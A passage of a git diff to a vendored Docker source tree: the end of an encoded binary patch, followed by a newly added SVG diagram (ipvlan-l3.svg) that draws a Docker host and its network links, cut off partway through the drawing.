zVAhq+mblRz+x520I3^1vI(e)c40TY9{Y!ODmq}-~m+~^{C@~j3`yP`XT}Lv*LrGMR
z=FOzdYrIH;P^(>kh7>Ks>3+XGUreeR?9=*R1cn=Kg5t(3cqwX4F0mG998NYSJYNK~
zn!zPCoRa<Gju&Ep>ecBNzCtRzy8K-^sZR}uw}W|XmlCUlpf=V}11|M3J|<r_y2nYl
zF#I19=Xn=bRU*ciwV{2zIyKoF^k?Ir96ZM69regSI@1TBYZYSAiOt|hMbHUM$#}*{
zi5ydjy-9!?%Ut7~9*b$<n^}`{hM=+6$Xx*uKqcymoUPuVwB$Wlb-S`K$seLPI&oC+
z7tMV`UR;OIYZ#4}db`rnenf9JWxzQL+w!$|9Es!$k^~(b;h<?JK?(9<bF*Dvo10x%
z5e7k_Q%Kio1_VXIO;LSKiw8KWOqy-xiWHD)KatK#(vD^vmkUDkZ_tU&x^ey>&SfE`
z*&G!j*JH{+vfw2?oAdT9(|YaOUYERd`gXo<G*KtQ-$nL56109I8T;o*{~}6h-C=Xd
zv>hy>oi}$?I4Twz9=K@=OENOvUu+jtfs7rmT}Pfc`gbFw0>?M_G$M0*YhDffOcykB
zSUeyro(Z$65FVG3E@<;H@a!vt7qH2B6hVoJ__2H<=3lf?<;0P2Q*ExWQ=C%dZ$FmO
z@~j^uP4GIH>?F~Uz0p1|7v5S)rSqIg4&-itkqf`#ZdGNsZ~rk<BDGN#prE)(-gOn-
zS?PDSBP1xJzwHOu-T$#~f1~`?oF;6K{OYA$x@hCtL_W70U9fFBtLuOHO|q)0qj1v3
zutBlQkmozn_l>*p$MfSgoo{Mejn_19oQuxL+X}`WXEcb*=12X`_`VjL9XMyel0D{7
zU2&clVO>RzUkHoSrL;#GAnAdNu~H*ZU%~H^n&XFZpJLmpos&nv5$Ir?`ak;-z@v=W
z11=VBE>@YanO6!+`;2-t;7omez=@^Rx&iLv8u(W4zd;>=rqZ)<JudH+zD~LrJO8Z&
z+|whdMzb`rg^nE)dDz(X&;S-Q=E{5pA0|DU2qOnHe|WIRsv-Y#(bsKfFwn$NpnNhK
zD3`~DK+US6m2C?dgHrRFW(MsmH-hH8wHV;wI4D6RSw3MW(b9PS0EvD9Gg@<@7e8RR
zWf0j9zwMZyG)=0S=&TQRqALUC=-DKE!9!0W>O;q}7tY#RowJqfzsqj+eb#%PvYZE*
z@vCHaR4TT%LW)K${^f^GA{f6|vdnLIFD6Q@{;SIb{2JW{?nTNM_9~O^jW8ezEo~v-
zq$ORU$H?>Gswm;)uhT*wJFL0U5brTnl4;poes2Rx<JnTRNB1stP5TG0wpKQXF{}a^
ze4bJ85FK~?MT>UQ*};>2o+swK-xXFGWH7|Yvj5j+X2zTGhw!g@4>Jt#o<r&6(k_l)
zXoE#wIU@$|(GRkoziN8IIibVUi5Kt#aaq1Ko%tGhc2**NXH0iLIIR|{D&UO?<Z}Iu
zs%yd<4y;<_ovSh}T7%ZDs@l2M<oe<KH$hcktcro`V;87tR!KeAic6e?mK@jy9}geC
zJRo&V`JPB3b=wB;8C7Rvag`qaq8}lPlhjM1)zp-5#H*k8eUXMx=_1zX7}b>uOz@UE
zZA;qQ2x6`(ZJ{R_=Rh<lHh*;rSI)m>B9!5SE2|TG=Nssc!4(zW++6latl&==sNAlf
znZp)cO|xFX&E++jiwoWu$E-B!@v_Pc^!dLSr_a3mvSzs0>t+_cDuXP^349L&*oG+_
zJx1Onro!7kZz7MdE4pcFqtjs+?VtDvB}*y<;Wxstw>x%}K7Y(yR5rRB&@;SN1eOy`
z+o8s4q6>d&4ocSLT$QtVXjXrSBYQyT*C}5g-k&x{R}g)m0u)?-)POVAN?Pj*F-w;N
zAGtt<nmI_aYekJ(^O~Yt-D}X+ED5)OjUiwzSrPhcoMrKZufZi3b(r<=IZ=9jYRy5A
zgTB(U(1w#4B*e-LHx&3kj59Cnu$$*jY(>pdZni+MLW(hq>_C4CvWRXTQ{B4IQZ};t
zfCj7(Xt~%y8XVYU)<nqcs;sCe+H71)uwIb_yh&-s_#jV9b_J+@Tp7S5ro_O+;$(Cq
z*iP=glvO$Xmp4)dJB${3Q*vk^{L(D7onl76G#$!ixiZkRC{-&m3Szm*cz)QB8L<!N
z1ELJYy@|NT`O{O8c%7av<&5Fai4Qmuw3sX=1dWe>JZDS?#t7JK=@^t_oIjpOq7f@w
z;`p`C26J;3jE#E&7UUdR$$7tB83jcabI@LoQb~`h2GVOxeloh*Uh70KJZOXIt#Lsd
zI}m>ETK!y7A{nYF)bd7VjkTqz=nlPo${!xY;d%~37Vem@V5w|a(c-lkrfA7IudAY(
zo*8q*XzqbdOG67Z-QdmrO+FgYE+6(~5IRj9&IpNF;%Vo8f@JzD^SxT`%g-Fs`gkTh
zutYedybNXt1dEgw01vV(#leHm=fo;8&#vHoz$YtPHo;Uf%p_*V5Z9dyg$JREiCNB5
zA<VIbKp%1jhu)NV(HVHAnq7%DFbVQpLeK)ygF_3-3jI$;CIo{+Ir3%GbMf$glWHMb
zHE2u1&4EON5b_O8%Tj_*euDlvY)4XF%#<-NyrYRhD1kClg$RCpZ(3t$2s}Z}C*gd>
zEO^oEVHdHWj%rt9em85-_mr>9sYRDkP5+LAM=L>>TlOCy!8dviR3$H@IkA%SqrL#4
z8vDx+B?7`b^L4S?8>SCWA6Gx3&(Fw~*VjrS@w?Z_*P35<u4lcNKgCfoOTyS+<MMZM
zI&YsXNyB&D$Ft<b#8$1aXzb8YZ8=dqnbCBOXQv(F{R<#1Ed@}7du5V^fyCe0S(I5K
z|M_D_6nJivuk$-3^*fLyBrSaqbzNOLOImb{4MLEg6Rc)<@YyFm@2@>4tSs&07D(zM
z8aU4Z5@MaWMHD<u&kn_f+k{nz=7M00E7J$vEk96{#7cUYU_ONAI7u;&YM&Cr+u=Ae
zY2XL)+kxl;ndJ)K<{Qk0=O6RH(jYo(IkF@PjmOyyK~p&uBN)o&+5>C_iNzTO4t#|f
zl=2Iiop^~f*_>Buw0WVxpstXzI*OxmW(1Z436J9twion_%fJg(1_d5q*Yc#3d{nld
z-I9UUN0XOkID$A?sM%`HC3X@!Sw`y8w&nA;ak)zInSarJ&Vje8IBPZYs>AHd2f`B=
zzgX`{Yd@gzyU-?Nau}u8%*BLSlm}EDH)0J!7l1p4dcINO*vb@s`eqsBqg?7DNEt7>
z-|kGbxW~A6t1fU%xyD<pfy5>^5y;|cHmcJ%ip?&$)kYP}u0JYJ{KV(A`DJ{pE3yt4
zM4ilIClq;rW6|wQE#coE#<94s;WMDS2+A^Ie~|u6gfpy#8Q{Vui5|Gf;a5yW;(sb@
zwJ`7nYOpMf6&<HP_*90;p5bPCK`0g?i8DND9@V&Nq$U}RJ_j;HB686E$qxnIX9#@5
z^G@e%_lmXdR%LB1kWfo&X;CK>8Hp5E6euxzALT1kdd?LTJ7IWO2o1ehJ{q>;*00~!
z3yo>y5#01Qe-M!v&xyCJZ9(CfyG=xyPtJ`|YShOw){!epHxtNc$4`?y@Urm_H>1`z
z^z2KF;odTo(a=dPUlNK}8CKQ*#viT#BTUVyDD4ETA%}MNa(NY9qcCRg2CW;%FzU9b
z`Qf}OTbjCfLZN+%u^tu{=G3;{sQ86gE@*LW9yz1n91stI+B7??%F7(KXjah_0%M<x
zRftMio>70w0uw~z4S2K#R-)Ts+r|rV(f=UjY4RAu;`m}7^e3b&LuKoUR{77?`+abD
z(a%KcmnY=K_NEL{o^^kw&M~4H--%=mLBL8$yGMPB^4VqzN2Z|$y*ll<(b=jN;Ru9M
zmT1ZMGzg!^QcR_#<b(wZP;)Q4N|5D<N=T2N4^v+L7zUm?{)}rzj-f_Ug<G7kED6YE
znpmz2s6m|Vbz`uRqIDzS5MB%|ZI#QTu_&!OuPIh4>J85JW}m%S{w4tpau3Bh+2cu1
zyLR~C>qvZd-@Jw`!eB+Z!73nlPyb?=J~3Y&1TDbY=@ndKmcoIgmLr?LjVeuJGP>qp
zs`eGyyeE0mw<*W*jMK4zfQ(S3AU1)>G>D&MB!ZN&-1BGhLmA~6uRkr)AdrRPXLs1-
zb8xym-<h1uYG;{If(;SVC+bA=la(lhQLvP;;vvPsV~E?_X`jF;O4qZnQM^$UyMVDg
z7ae8Ih8C+AN>7@HLbi!xlaHq6#B~DfhD$Cax~r!r@4H&H%%O0YP-No3YXxj;+naW{
zJmtSD9W(Q7GuA6dspe?Pn*J#0wR0Jh7Fj=v_sW1%MOypm+r?<;jdLDqFs({EGc!~!
z9N5)K>F)8ez&r)?JrSA#@&a2l^f(pyK$rGuny#z%6zK9)ewBy_?DBrd(?)hZNt%J=
zz^^4WD)MkHtAoc~V;BT2i7sg9zOCD6Ez+gvUZTPklb56&U6qU*L(2-}ulpI<bS~}#
zxRl(bptJS2qpiP{Su+#Am#aAKrJB<jHP*Cl*GL@(6hin8GU8QpBebfU5kldvvmf@F
z(aJxIwjP<}KO9OQZamcxE6rWfC-!Pzo>Z!XS^rYQ83bmQzLzP!)w)4f*^(&}n7_KG
z03c8?QdQc;z!FqMf2)MxO_M4in9ZT-L(0j;QeeL})>bzB38xLHt%at5)dlaG7e+s(
z>AXiz&-FY7f0c19!qsLZwaC(>iL)VU#OtIAJNmRAO#SSwpM>!E5l>=t6>ezI*ML}s
zZGOF;(bK&!1R%=ZOpd@P7(jOLI{NDtx`ENh<`35g$@+)bZq_-uOAoyhN`5}WikFcT
zhnc0;p#I2~1wrr913&d&GE}WVc8(Sw>wqUSu4gG0|C(Yn;@*TI;9F*{pW!DvA%#|E
z8Cz9z+zhlfA_}_0@7SnCg<qe4A2BAluk?$4unz+f0%I$WBFY+UV{uL!qFzf+s5uJZ
zXe|pSRhQ}ztv4jZZ>6xF!+qB3n$ypPypaL;e|{zyvFx*a$Kb>1g5n-WDa`yB;gL<7
z6StQ}cPUw*DSsrE=m*qW(7p)iGRJU+(GMRLN!Nwj_g)Zh?JV$VJ}p03ACgN*oj7J5
zBYojC@=|y}3_cvQoErfwactWc6*g^*giL3!&b)#Q!XhyCVA4^qeSq$t4I)^sKJ1;1
zC4N@1Xd?e*ME_1d`*#l+b`wtCo&gJ(q8M^^E|P=MH4n84Fb*u5ed}b6=0U(;EDbp)
z^P`+cR+Zf{k*0uiHnPgHni7>G$q=^^rXT+~H#JT{Q~q<Fpjghj;4J1VCJZLr0|ZrS
z^Mdq5j`t*&<ciFBp-(Gni&=WmJ6&N~r0vb!uJM1xk+%9GkkcwNr(EzG&Zp!n;Z~WA
zz3gv$+;MQbgj_t1rjFjMKT}?qHqc*yXKFMO%8NxvB|fkIL+?`bpN+QRxlOp)-B_UG
z&n+HVq-^3E8rIGqm^6_Ulo!k{sSrDfB!`ocP_bxpo>C{TlwCzWuQgW-8S4M*NTTEr
zaT`Y=a!jhHTVn1OGkuXyR_IUWRF(nnuiNskz$zj!Bs7!M(?6Q0`a}>Y!4N}@9hg@Q
zWPxXd#T}1_x1s4b?k*Y`mTD=H)T3V;MdCg1a;MACU;odjaHt{IfJK<$H}$H|D8k}3
zA-`O%5$BH+y@R*kl1ZLwvdS17mdTd)IfZ0;dIg{m7p*hu4bPiL?@a;_>aSnxDn?pr
z5|IVfBMZz(Pn_o!Z10Wgm_8SLU6S~ww0m>ET0TG}Di|*Es|LI)lR^JPh%+88%5lX?
zCL3k%mf}<#N1R!bUGCpgo}M;Vi@yjb6qH%dLW712_cHCbSK19Cu>eI+erErHh-O-H
zG^XT_)Pj|m=zE=gEsZy>Kp6#==aSJ3aFyH%jm-~nl@tkt*#ljYXjmw=k@SR04BgTU
zy&ZggKYC^cIr-hxZ$_A|^OyBi>GAd2ThZXS$6yAwshKJEcH~NWWYl$}*RZEF%p!4O
z6k|tsWrOX#mFZn4DbHooDZkrb00sQ%{f~wox^)j<U5}RarXEcx0w#HYKPkYCpYy&`
zGZ(v5$zxBIT%R6<uxHQ+&2Wzy;le%Dhliuu=)lbh0?t|MhE)(J2{*=YN4*idnz_a+
z>(PRYv0yB&kX3Fk0)l2z=?#x*m~FXEGfqXoN?@|qa^2Ng$%=Rhy1@K2>B#_6Sf~uG
zv?Wpzy38r~U4*S;-jD#v$nbg<Rtbc~DQ=g!tWh+{!GHILnc)LiLHcidBy2{3r4|AD
zSkH*Rwx6~sqM)nkjh3O7ZF9<tXbnamdy5c!GvaohyUa~me<uT<QJ(VbOY2Pn>~)Ds
z-V1jS38MSa$3U!PWOv>AG!KB-3!SVD2~@J&Hm$GJ606ezHEt5R!^dP*Sue2R5LlI2
z1-LyCs3tiKBP~1~b7XB;$r2_FqN=cl0N%;V9|aaY?B|!eYOM0-ZbpIf8n<-@TIxp9
z^7c-33NeU<43x4ZFdk1!;pIA|A}N-~J>BmGIIg$RP_gtk#`@VJN5h?>C0I{^b3N~1
zL}T7Y_*AY`dvMB{*^gQSaJ{(MhhL$y<HdkWH=PZz`&$MmaB*bp6lSmHM@1Pa<3sFw
zWmVIU(%9)RfMArfz~b%`X|y<TEMt{abr1o1Cj9><$292A*UFozBZM3~(;sZPVTPX`
z;ztmP1_t8Lp6k=iJq^y+;yra(H3?$I`wt!P&D$Rqaw9m~zrI7yN>tnfofCm)94zL<
z{8-Whkl46_vzx--yXbF#KUFaL+AsF%slVT0W>T-qm6{TrH%TU1R#Dz#&sIqI^kc9q
zw;ri=0GpQBmuLj!F)rno96#NBMH7K1mIV&TBdM=`PwA8(&&;y*v!;cQ2^g}>|7IK&
z57obBP%K%COCx4G=d{oLt^#C||MTFtmskAJG=zLftXu-gq5R2!)-dyNzsq;AhpJ*K
ztAu{Ph1kAg!;d3$9)mK%N>LoaJ6GW~tMF$LmgWBjvKBQoRUp>PGL|Yg#ahkBU^EbI
zCN=B-|3LY1ADW^>m0j6H>nhiv@Dh%uM4VmO^uIyU<p`1rQ0Bi@dYWqx^fhV+t}X2o
z9ZpU|8xV&ZzAFBh*QHH?<c}6~rR3%r-$tX9D9sk|@byYuyNv^nNtD^LJRc$d=w!<M
zABprsSMdL&ci{g@<R3ZO|ECkM`aj)<`~Rz3<PgM8>Y7_l5?Qaz;Qx~5a&@|NyX?l;
zPWS{aMqby)>DCc<GrZ4r!K^`=Sdx=auy7<1B!flpF$rj7ND?+{(s>pg25VM8%gPd{
z`i70!YNM^ddIOqTtT0OkHEjp@<;h0ZO4uM;keT|rp-APLsivz)9fl6|zTY{|<3`r2
zp2t(8iifGA!(nH(*QDE|&z9Gt;4Rep%U|4mZ@RU#qedH3g)#NR|G8wRR*hT!yYb=O
zXDa<S6$YMiDixs38S<}fM#OQ=oRb_UD!i~sLQu=5$>#S{z1Os6_P4%Hl<$e#142Zt
zoR|#2%+LVsMg}7bni>hQ{pP8=FrVA45RMiq8$yvnSL*tL1$I(QfS%M(yfP@iS1AWP
z2lIKKPNAM=3+>*#(-?K6gtfuQnxk1THy7?{9n%Sd!kIXmuYZMOhTWt37B?yU#B7r?
z=G^ACYZRx!PSFSS6<Q7I=~y9{F;BCg()qh1|MmxG)se;-wTan-+!kZ|ro_g>NzhE#
z@p9cd3|MUYhbKhOR>}1xDRPICg~677VMF>KM{yOwwG8jd7oE(Rq;LFL?168HD!j6u
z)d2J5o;$D6xnA0_@ZFBP_J%DqW3f8XN|uy@{jn%Mm#`VpCJ@E4D1=!QIe1d?Yy(Xc
z^!Zww#2ur07i<<=5|fSP_Bw?qoU{lGBg;fMyhdq<vlR<b)xHAU1%un!3%A~H)8&(Q
z>l2A=R4Z6;84N?>%8R+{`C(sL!izbn-3vm$vn0B+f&fsN`3e9f{dyAlRtYQ)7R&;f
zo*r*1v&TM6$SXV;|8_Its9kt?6T)TK)NxUS7*1tdO>{+`#NYijV*`DvbsCLSv@;ES
zH;(!Dz+Rc`LkCBnZ4O6IIJ}Ij(-iK0oG7sxy3yt99q~GzzL(svlWZs2^>>VrPdQPH
zpw8bvR!qC&;aIhf*u`*>;K?rINRW6-(G<<#iDN{W6j1z+D--bGVOxfI!Jd?*GG<lW
z(^R`*tJ<L47Ql-B1|d1|@^8MmaOaeuLXJ+C#nqe0Pg<&~C1x8*^f@1Rp5MoC@mOEP
z^cg*Bdjc>@HGRC=q%kZm^;YZa#SvWfyxZylM?9sygkg0xe-)JN$i~3j4=>q5^3lW_
zeKCy?#k?>FCGd`ycvAk$(@B1A?dg~tl1$5R1!P?();c;9SYAsr{G;+cQT<F(_#7X}
z4NhwIO<|q(q-9|RInTgX;baxazU{I9#gFY<{uz$TBM<|+dwxp!MqFA9S10H%wZV1Q
zq|v&k1kzmD*cfn%s=@9K&PSuxa(L0@V{qz3>l-icPs#uf4>R)!KaO&u-5@<9+Qyv2
zgSmcVgp&RhF-Lx9Fr;BoSG%pcxS#E*M)5{$Z{6oiIA)0^`2@ahw9T$?)zep6<8@sN
znFvBk8>g@0XERfv;dVO*95Bl7SXK=9|5Ku%R?vlcUbP+!ABR<d%B839m&7d9?5vTr
zl6Iu6hb)DJaByx+b(J?l#I<4i=?PcSQS0mS!^vaSM}tJHkY8pVBfCQOPAQRyZuEg*
zyxcyN$@V$&w05^~+m7&!r72r32S3~G7ak_I;MNK+Mp%LmggXafHrBdrkbR~H?^)Q(
zyW376m>6X`x9tPsM28o9NPb&|y<*Vh|BxTP&W`MwosXwnC$;YCxBRwUUIQMF@s0~s
zhMr9cE`1N-j~Lsn*x)W&h%1}OK~Y+-(!IdT4LCYMTgSTKNuLwG#SnV9B^0$o^I-&d
zEB_4%Tdej+$XUsazv3nMegSFWg}`zr!-Z`38hLMM_dx=fr$EHXl+Cl~p&_<g4p%-7
zZpKHaMg3<|0@%&}>DwluAB{H~tZkx<-hN;&4CCl5*aJQc2qi7WNiE_EbCV{|Mw%gm
zU7(B4SKd`!FkvTDi?}!5)_zC(qda#I8p9I+@`^e~n(dK-F%=;)_Ij+JIAnVYBo#AE
zNAEvV=szD{AkJY6Lx)#1qa`-2sL7jZM=%W?9RDQ>&TH~rjkqF_X4+h>?2S;6q0mfD
z^sL&_!jNx%G<!BpDNFYj;o40H(N92qadq^6+U>MnaAQ=w%3-sXl8aH5+3HF9b5pfq
z`C~s?RAg5YSprv)0CvY*>~1o<h!^TCqo{1gnz^cIdG(@INlq+}H~T*tC_kqutFX9V
zvf{J~C&B?6!kAG_Up-bfGp`fY5}TxW{DO@(Usc1JV@`5tyr-01`o{mjt(<|HkmKZN
zPpU5gci-K6ML9bWzRd!QgbeviG<xGtQr=F74l3qpF$RvyKc%=-V%bslCqHk1ag^bp
z-9#_WX=0ms6hwJl>@y6xaU!E9r=hAU!;bt7L&#uJloz7o;bTLQ@hOT*7iQmj=<}S*
z8JH^4bM=<Yo+eDEgI8@tZ^NZR8Icd-R7dTIY|H24n>LI<x}#}9=<$rG)g=oswC$lk
zF_+nA>55#zrwlHaIVwK?_g})Rp;Gqjc}(SeJz3?Xs4&({VfvzRl&J?ISrJ82m~9yD
z>~4Nb<zVqXQd#AuU}T(q?SE<7JEU>So$qEyF5}p|!AiOZ%uKV{J9q|X2bSTwfkBzp
zq@9pkm!7bCcfIRk{sSE0^%U1zxsv*Ssptc7=_tObJsm;QyfBLU=(xs`m9BukN|8_5
zDia)iupL;<!BQSR3QNN5_)kd^0foYp)(=bT>TlV(JjUiPiS7yqG^P9VU>Z)u3~nGf
zJfmNSh;oc(4-Dc>)wXKuuyG=r%n$~OT>B|)nB1$>&&LFm%^LaVf6XBk55vOp;n-8V
z>~ICg?cJg8EbAoN-fZZs=`1NYH3}ehhPQ!Ln*2A@%HG&rjQc`)(xNoq7iQoiaZ+Si
zGzvHwmCjc<&A1_3Yk-f;*XT~KcR)C3pG75L<ma%-&XG_j3?eA9VhLU_Z(n<)+`;mg
zWh4W2Usc#)VPV}^1^eTj3ONVJF#~7zW_=;_37yG|CP@REL^RYywzZOcrNao-pkjnj
z!RGAoBi1?pTXaA2eC{4MM^rqu_%qCX2Z*+SRTMV*?Pl0wq+C?_gR4PUhqOhg%0Xdj
z4-<^(Cmu}eL*Iy)J}!n@4d$O|yYcKqIfsgU;AFW!N<}3>YWD6m0WWRX51~AhcsY-c
zMZP`DQqzpvRmFOpWF~^ljzWxa*@(`&NY$)-{hv)RI(nzPk-Mo451`P@ZA#P|fP&@t
z)DqqQR_11mtPm=ESM~X`jTKE3+#*^Gp#Y^+09xTH<mOWVos+tPh3?5;q-$f`vIIkI
zS5+8x!KHhdOkhKXSi+fAo-RD?L6m%7^`&LII8Bp(=t6@2O(uNAU{E$fQAJNn=?Nk2
zu!M|3uj$+C2C-FO$2ckZ<Sp&pHJ>7FK_C;2m19OdMvPe^Yl;wp5*t!ch-YkD&-ho1
zoI$$7#aIZ&^zJ6!%H*Mli>CcaOPqULQHg^k@gW?ykRae@*v7Pgex5B&-!puyro;E5
zY&Jon-MYCOT?u`(BMS?~j|v=NWq~uFdkSaO%D=@dMP3g^v}IxWy7g)Ic^Y6xu13EJ
zQe!HY>%j;7gWQ(FocLV?%oPxptEmq0?EvU$c^&wU+C?xIm$A~h7kXzIycIepNR_u_
zgWyon(Q5ODq@muYEd-&I^w)hdKjn+uAzpj8DyF@x(J~4M9iIpkp0n6r<rJln7wzqS
z<~jvo7uM}j-{?eDqZGcoymI?Ab#*~4=h-*F%3S@!iY!CJk)I(-WF_03hb$NzkF4PM
zBLR27B1HpB0am#~-e2@<yuIe_sop^r<<^6|RYv#y&rotz&ENWi`60nA$I9Bb0nCMq
z7TD^v=8`rhZ&G@JdTq{MNTn8)_^-=H+C=Mcem^Dd5q^BruetbreU7djG0y*vxZ}1p
zSh3;z;<?AVCZgUvhF^2R?Nis)>l&Y8Yx*8SSX#4b&t6MtY-+vi9=BG05!BwEc7Z~-
zwyE}!zIs(w>9rhNTYsThyfMG|@#yNaw|o)$E^=r<r|sa^cVYawRJgWu$%X<Et1sa4
zI)efz+<qvp9KsEU#I{@K@w}M75J8meDYuroT5tV-0!s$8`2b*lj!_VXVlV&){;gCT
zRM1Tn1Q!QKhtA?Eb{5=TPf#3s1Xo4G3-lfidV($$x_As}9kR4M(@sjhA++R${GmUm
zlu}A5rIb?J<dM=3NYdx0*r;#=;MlEb8vb@Lrp6rXNT$^Z^3}r=5EO+hLL=SHL-s7<
zE9K8Z!>u~97`Wc|aHmuv!iaz7SWsgge3Egn&R07)Tuf1jRb-a#<{^6)!Iko7oP}F*
z5qbk6nqWmGVs}aGMvZ0X*-M<z&sTfsQ&B89vtTz5S+jh3WxLKZ&cZFZH|bW`8dniT
z2kxhrx0_{6w@?#haX$rE!GtV{(qKplA+3qERN6?I)uKd#F+f{zLz+@bKrv|xEeNFq
z0zt(FtgTX@2oO<`Sp29#NXmQk?a%PuJIvV~p1^}%;B{y2x%ZqiZ+2%2q}o+{-TtWb
zC#HIX==*PsDX%Wh1+-PDE`@aB(CyWb9u38&x^%`R3`0Y@eng-%+w^(-@IKLNR)kF*
zGRD=RNTR%)`<QZz1|4iTYKL{Rt3->Rl*X$|8@IltFJ|Pi=u_WzBTutdTTz@j6Px<>
zRukMQ8@8y;1k?ixEt2%P0fzVT^6{HB+G;v)8DLlftHq^IZ5iWC8_#_|>+)Xd>fMlc
z;(Cqf=lgW3+Cz`tctK_Z>NE{H>Jp|pMqk|xi@gdByYsc&=n}0Z+(%R2(W`~Lt3#2*
zdO)S$L#m*I&Vt&*3g+r9qUoeTgFTe{V@Mw!^`IMhn)SsvQR~5k?4`*B+$kH@C`@oT
z^?*W)WPNUc;oVkIw{?*Th9yufNTJ#;w8;{Et#hP)hb|j48~$`KLQ{uLKA1PNdX#k<
z(+KCy2%UF{`eT9G$<iUi1&p~<9Jd`$X<O8x8wU@jo7}e5!Ke1HjNw-IXhNv-!7*d_
z;ZwIpo@NavO8(`{#DU{BDH~eUZUU|Wg%$~)8(?^Ew~-Zw)fX*kiFTp0z0=%b_i;Vw
zk7ZX)C&SdK*8x2~>Q8o_{c?l4O<%FsCHO0FZD;3$pxX@V^{hd(@nW=ppxbSrX-xTP
zf;x2L;6X(&575D<-fqX{Yio&&E(^7;I6r*q*2vQ=0a1JgYZq|GDH~b@6C7|2D6~lU
z+yKKnr(q)l%wK&q;8Lj836t@i+I{)(hYKStSUg|)ZJ|`qi&y<|X*}8{jd!DS15KBh
zB^$@01$&gwg+zmiwP3$wtvXkvvkQ}nV$easpaxc=p}#dNmRc{}{P3w;qjt?w3{is9
z47h<swG=tLr@rE#(4uLd8&<hD(y);ch9!tu3sR6cArl#+&%XZhn5@<-+IyZiOUxIq
zQlY%OmUPhZm-cxT#+eQY-az}idr$wqP#wDz^V$Dr63xj$q4jJ&diFBvP-M@R{#Y^S
zpeh{oAg~f0Jge?>pG_4^#1EeuBTuswLsYekDWh|x0=UyQqzEP?oci}16k0UxbHl3h
z?pe+V!|JPnl*A{(m@!7^EVqp0py&{)@-kH#;Zb?Z(@DN2vu}y6{$!TAk(gyT^Og#B
z`wr8ag5jhwiW#8?s6&y>o^3Kmu@@a=7StDkwX+j?01LIg5PA627<rl{AWFX#E8GR#
zX&YSRnSg6Rp+(a^H>^7Ep5=@%tiBpZNqnCfvqrQ)xzWwjG|=Qqn)&cF$z9^S{JzWk
zygtOc>)O{ulgSEIT!PtXW3x-|6&0188+vC6-}sqN!(1=wP-M3dZT;KB^3g#8)WF)=
zE*kxj=p)0_dYh7mPmPhMIW}#g^0gBeSEUQMQ#P~+CM2BtIR}Ln4WAoUop;YhMi^FK
z4WuLrW2V5#Q9LPo<;s`*X(l$q#a?lxckao*-sZ`F`1gxXUL*vn|I-_`hu2&{L?`X-
z;)?wF-w_kJIuuFtP2CKb;{Y8rKn<*o&lvkFyJPAOG06{~8Y5q`n1QJ19_!f*I$PXn
z8(P$60_wLN6k0TVZdi5RErEhF!?60Q#idZKjM*dF-HnZnJ^Kk!-{<kZKj}dMY#Y{h
z_jqAYm!^yT4*tl;W}yCG%@Ab~2Yx@l8bvUXR*%|rHNf!x9586{r~hj=4haAN000F2
ne{FFFBpv_&000000000$(4un~up*x$00000NkvXXu0mjfxSuby

literal 0
HcmV?d00001

diff --git a/vendor/github.com/docker/docker/experimental/images/ipvlan-l3.svg b/vendor/github.com/docker/docker/experimental/images/ipvlan-l3.svg
new file mode 100644
index 0000000000..6ed1430800
--- /dev/null
+++ b/vendor/github.com/docker/docker/experimental/images/ipvlan-l3.svg
@@ -0,0 +1 @@
+<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="467" height="441.5"><style xmlns="http://www.w3.org/1999/xhtml"></style><defs/><g transform="translate(0,0)"><g><rect fill="#FFFFFF" stroke="none" x="0" y="0" width="467" height="441.5"/></g><g transform="translate(0,0) matrix(1,0,0,1,12,200)"><g><g transform="translate(0,0) scale(4.340000000000001,1.97)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.23041474654377878,0.5076142131979695)"><path fill="#c5e4fc" stroke="none" d="M 10 0 L 424.00000000000006 0 Q 434.00000000000006 0 434.00000000000006 10 L 434.00000000000006 187 Q 434.00000000000006 197 424.00000000000006 197 L 10 197 Q 0 197 0 187 L 0 10 Q 0 0 10 0 Z" opacity="0.93"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 424.00000000000006 0 Q 434.00000000000006 0 434.00000000000006 10 L 434.00000000000006 187 Q 434.00000000000006 197 424.00000000000006 197 L 10 197 Q 0 197 0 187 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" stroke-width="2" opacity="0.93"/></g></g></g></g></g><g transform="matrix(1,0,0,1,265.8711037056154,215.5)"><g transform="translate(0,0)"><g transform="translate(-275,-8.93295288085936) translate(9.128896294384617,-206.56704711914062) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#000000" d="M 357 304.5 L 270.3711037056154 220" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,76.5,215.5)"><g transform="translate(0,0)"><g transform="translate(-285,-18.93295288085936) translate(208.5,-196.56704711914062) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#000000" d="M 81 304.5 L 184.62889629438467 220" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,10,204)"><g transform="translate(18,0) matrix(1,0,0,1,0,0) translate(-18,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="113" height="16" fill-opacity="0"/></g></g><g transform="translate(18,0) matrix(1,0,0,1,0,0) translate(-18,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="113" height="16" fill-opacity="0"/></g></g><g transform="translate(18,0) matrix(1,0,0,1,0,0) translate(-18,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="18" y="0" width="79" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="18" y="14">Docker</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="66" y="14">Host</text></g></g><g transform="matrix(1,0,0,1,223,77.46151194852928)"><g transform="translate(0,0)"><g transform="translate(-10,-28.93295288085936) translate(-213,-48.52855906766992) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#000000" d="M 227.5 196 L 229.11774189711457 81.96151194852928" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="translate(0,0) matrix(1,0,0,1,57.51435447730654,10.461511948529278)"><g><g transform="translate(0,0) scale(3.4320505881432197,2.464785030240155) translate(0.00001348378,-0.001498589)"><g><g><path fill="#FFFFFF" stroke="#434343" d="M 33.84 5.912 C 16.263 2.403 6.986 11.405 8.451 19.186 L 8.57 19.61 C -5.128 21.942 -1.537 38.106 